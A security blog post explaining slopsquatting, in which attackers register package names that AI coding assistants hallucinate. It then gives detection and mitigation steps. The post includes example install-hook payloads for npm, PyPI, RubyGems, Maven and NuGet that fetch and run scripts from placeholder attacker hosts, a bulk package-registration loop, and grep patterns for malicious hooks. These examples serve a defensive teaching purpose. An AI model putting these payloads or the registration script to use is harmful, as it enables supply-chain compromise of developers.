Slopsquatting: An Emerging Threat to Developers Using AI-Powered IDEs

Companies are racing to supercharge developer productivity with AI-powered IDEs and coding agents. Tools like GitHub Copilot and CursorAI are at the forefront of this transformation, offering developers powerful coding assistance and automation features.

But there's a twist: bad actors are exploiting AI "hallucinations" (cases where tools like GitHub Copilot and CursorAI suggest package names that don't exist) to launch slopsquatting attacks. The threat gained new attention when security researcher Seth Larson coined its catchy name, "slopsquatting," and when a study by researchers at three universities found that roughly 20% of the packages suggested by code-generating LLMs don't exist.

[Screenshot: CursorAI suggesting a package for my project that doesn't exist]

In this example, I asked CursorAI to create a simple XML-to-JSON parser. It suggested using a package named xml-js-parser, which, at the time of writing, does not exist.

In this blog, we'll dive into the fascinating world of slopsquatting attacks and, most importantly, show you how to keep your projects safe!


TL;DR

Attackers are scraping non-existent package names from AI-powered IDE suggestions, registering those packages across npm, PyPI, RubyGems, Maven Central, and NuGet, and embedding malicious payloads in install hooks. But don't worry! To defend against slopsquatting, you can manually validate package existence and metadata, use SBOMs and lockfile checks, run installs in sandboxes with network capture, scan for hidden scripts, and adjust LLM settings to reduce hallucinations.

Image from the research paper: https://arxiv.org/pdf/2406.10279

1. Anatomy of a Slopsquatting Attack

1.1 AI Hallucinations Expand the Attack Surface

AI-powered IDEs and "vibe-coding" tools like GitHub Copilot, CursorAI, and ChatGPT occasionally suggest packages that don't exist. Attackers collect these hallucinations and register the names, priming the ecosystem for slopsquatting.

1.2 Bulk Registration & Realistic Metadata

Attackers automate package creation via registry APIs:

# Example: batch-register hallucinated npm names
# (npm publish pushes the package in the current directory, so each name needs its own minimal package)
while read -r name; do
  mkdir "$name" && (cd "$name" && npm init -y > /dev/null && \
    npm pkg set name="$name" && npm publish --access public)
done < hallucinations.txt

Each package is populated with README, version tags, and even fake contributors to bypass cursory checks.

1.3 Payloads in Install Hooks

Slopsquatted packages embed hidden code in install scripts:

// package.json
{
  "name": "dangerous-libx",
  "scripts": {
    "postinstall": "node -e \"require('fs').writeFileSync('/tmp/pwned','you_are_hacked')\""
  }
}

When a developer runs npm install dangerous-libx, the postinstall script executes silently.
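A cheap first line of defense, if you can live without legitimate install scripts: tell npm to skip lifecycle scripts entirely (ignore-scripts is a standard npm config key; the package name below is the hypothetical one from the example above):

```shell
# Block lifecycle scripts so a postinstall hook can't fire.
# Per-project: persist the setting in .npmrc
echo "ignore-scripts=true" >> .npmrc
# One-off alternative:
#   npm install dangerous-libx --ignore-scripts
```

Note that some legitimate packages (native addons, for example) rely on install scripts, so you may need to re-run trusted builds explicitly after installing.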

2. Validate AI-Suggested Packages

Before adding any AI-recommended dependency, follow these steps:

  1. Verify Existence

     npm view <package-name> || echo "Package not found"
    
  2. Inspect Manifests

    • Check package.json, setup.py, or .gemspec for valid license, author, and version history.
  3. Check Popularity

     # npm view doesn't report download counts; query the public downloads API
     curl -s https://api.npmjs.org/downloads/point/last-week/<pkg>
     pip index versions <pkg>
    
  4. Review Source Code

     # Registries aren't git remotes; inspect the actual published tarball
     npm pack <pkg> && tar -xzf <pkg>-*.tgz
     grep -RE "postinstall|preinstall|system\(" package/
    

3. Cross-Ecosystem Impact & Code Examples

3.1 npm & Node.js

Risk: Unrestricted install hooks.
Payload Example:

{
  "name": "lodash-lite-utils",
  "version": "1.0.3",
  "scripts": {
    "postinstall": "curl -s https://evil.sh/install.sh | bash"
  }
}

Detection Snippet:

npm audit --json | jq '.vulnerabilities'   # npm 7+ (older npm used .advisories)

3.2 PyPI & Python

Risk: Code execution in setup.py.

# setup.py of slopsquatted xmltodate
from setuptools import setup
import os; os.system("curl http://evil.com/pwn.py | python3")
setup(name='xmltodate', version='0.0.1')

Audit Command:

pip install safety && safety check
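You can also pull an sdist apart and grep its setup.py for shell-outs before ever running pip install. A reproducible sketch that recreates the malicious setup.py from above and scans it (in practice you'd fetch the real file with pip download --no-deps --no-binary :all: <pkg>):

```shell
# Recreate the suspicious setup.py from above, standing in for a downloaded sdist
cat > setup.py <<'EOF'
from setuptools import setup
import os; os.system("curl http://evil.com/pwn.py | python3")
setup(name='xmltodate', version='0.0.1')
EOF
# Flag shell-outs and dynamic execution in the install script
grep -nE "os\.system|subprocess|eval\(|exec\(" setup.py
```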

3.3 RubyGems

Risk: extensions hook.

# rails-helperzz.gemspec
Gem::Specification.new do |s|
  s.name       = 'rails-helperzz'
  s.extensions = ['ext/install.rb']
end
# ext/install.rb
system('bash -c "curl http://evil.sh/attack.sh | bash"')
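Because extensions run arbitrary Ruby at install time, it's worth flagging any gem that declares them before installing. A sketch using the gemspec above (legitimate native gems declare extensions too, so treat a hit as a prompt to review, not an automatic block):

```shell
# Recreate the gemspec from above, standing in for a fetched gem spec
cat > rails-helperzz.gemspec <<'EOF'
Gem::Specification.new do |s|
  s.name       = 'rails-helperzz'
  s.extensions = ['ext/install.rb']
end
EOF
# Flag install-time extensions for manual review
grep -n "s.extensions" *.gemspec && echo "REVIEW: gem declares install-time extensions"
```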

3.4 Maven Central & Java

Risk: Static initializer abuse.

// In a malicious JAR: a static initializer runs on first class load
static {
    try { Runtime.getRuntime().exec(new String[]{"sh", "-c", "curl http://malicious-link.com/p.sh | sh"}); } catch (Exception ignored) {}
}

3.5 NuGet & .NET

Risk: Remote DLL loading.

// In a .NET slopsquatted package (.NET Framework permits URL sources
// for Assembly.LoadFrom; .NET Core/5+ refuses them)
Assembly.LoadFrom("http://evil.com/mal.dll");

4. Advanced Detection & Mitigation

4.1 Generate & Enforce SBOM

syft . -o cyclonedx-json > sbom.json        # syft generates the SBOM
cyclonedx validate --input-file sbom.json   # validate with the CycloneDX CLI

Use policy engines (Open Policy Agent) to allow-list known good packages.
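Allow-listing can be as simple as diffing SBOM component names against a curated list. A sketch with toy files (allowlist.txt and the component names are fabricated; .components[].name is the CycloneDX JSON path):

```shell
# Curated allow-list of approved package names
cat > allowlist.txt <<'EOF'
lodash
express
EOF
# Toy CycloneDX-style SBOM with one unapproved component
cat > sbom.json <<'EOF'
{"components":[{"name":"lodash"},{"name":"lodash-lite-utils"}]}
EOF
# Report any component not on the allow-list
jq -r '.components[].name' sbom.json | while read -r name; do
  grep -qx "$name" allowlist.txt || echo "NOT ALLOW-LISTED: $name"
done
```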

4.2 Lockfile Integrity

# compare declared deps with the lockfile's top-level entries
# (npm lockfile v1/v2 keeps them under .dependencies)
diff <(jq -r '.dependencies | keys[]' package.json | sort) \
     <(jq -r '.dependencies | keys[]' package-lock.json | sort)

Reject builds if unexpected dependencies appear.
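Here's the lockfile check demonstrated end-to-end with toy manifests (contents fabricated; a real lockfile also lists transitive dependencies, so expect extra lines there):

```shell
# Toy manifests: the lockfile smuggles in an extra dependency
cat > package.json <<'EOF'
{"dependencies":{"lodash":"^4.17.21"}}
EOF
cat > package-lock.json <<'EOF'
{"dependencies":{"lodash":{},"lodash-lite-utils":{}}}
EOF
# Any difference between declared and locked deps fails the build
diff <(jq -r '.dependencies | keys[]' package.json | sort) \
     <(jq -r '.dependencies | keys[]' package-lock.json | sort) \
  || echo "FAIL BUILD: unexpected dependency in lockfile"
```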

4.3 Sandbox Installs & Network Monitoring

# start the capture before the install; mount a host dir so the pcap survives --rm
docker run --rm -v "$PWD/pcap:/pcap" node:16 bash -c \
  'apt-get update -qq && apt-get install -y -qq tcpdump >/dev/null;
   tcpdump -i eth0 -w /pcap/install.pcap & sleep 1; npm install your-app; kill $!'

Alert on any outbound connections to unknown domains.

4.4 LLM Governance

  • Temperature Tuning: Lower the sampling temperature in your LLM settings; the study above found that hallucination rates climb as temperature increases.

  • Post-Validation Script:

      # suggestions.json: your exported list of AI-proposed package names
      for pkg in $(jq -r '.aiSuggestions[]' suggestions.json); do
        curl -sf "https://registry.npmjs.org/$pkg" > /dev/null || echo "$pkg hallucinated"
      done
    

5. Conclusion

By validating every AI-suggested dependency, leveraging SBOMs, enforcing lockfile checks, sandboxing installs, and tuning your LLM settings, you can significantly strengthen your defenses against slopsquatting attacks and safeguard your software development process.


Written by

Hare Krishna Rai

Specialized in uncovering vulnerabilities within software supply chains and dependency ecosystems. Creator of SCAGoat and other open-source security tools. Speaker at Black Hat, DEF CON, and AppSec conferences with research on malicious package detection, dependency confusion, and CI/CD security.